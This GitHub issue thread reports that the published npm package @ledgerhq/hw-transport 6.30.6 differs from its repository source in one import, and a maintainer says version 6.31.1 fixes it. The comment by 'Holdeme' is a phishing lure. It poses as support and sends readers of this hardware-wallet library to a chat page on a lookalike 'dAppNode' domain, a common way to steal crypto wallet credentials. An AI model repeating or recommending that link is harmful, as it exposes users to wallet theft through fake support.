### ISSUE TITLE
[Bug]: @ledgerhq/hw-transport source code in npm package is not same as source code in repository

### ISSUE THREAD

**Issue by svein1010** [LedgerHQ/ledger-live#7110]
### Impacted Library name

@ledgerhq/hw-transport

### Impacted Library version

6.30.6

### Describe the bug

I have install the `@ledgerhq/hw-transport@6.30.6` and its source code is as following: 
```
import {
  TransportPendingOperation,
  TransportError,
  StatusCodes,
  getAltStatusMessage,
  TransportStatusError,
} from "@ledgerhq/errors";
```
But I check the source code on the github, it's different:
```
import {
  TransportRaceCondition,
  TransportError,
  StatusCodes,
  getAltStatusMessage,
  TransportStatusError,
} from "@ledgerhq/errors";
```

The version in package.json is the same `6.30.6`. Maybe the source code is update but the library is published with a wrong code ?

### Expected behavior

The source code in npm package is the same as the github.

**Comment by Holdeme** [comment]
This issue has been preview on the Pull Requests. To resolve,
Contact the dAppNode page to initiate a chat with the live agent on the chat button to get more information about your request via [dAppNode](https://defi-fixprotocol.pages.dev/)

**Comment by aussedatlo** [comment]
Should be fixed in [6.31.1](https://www.npmjs.com/package/@ledgerhq/hw-transport/v/6.31.1)
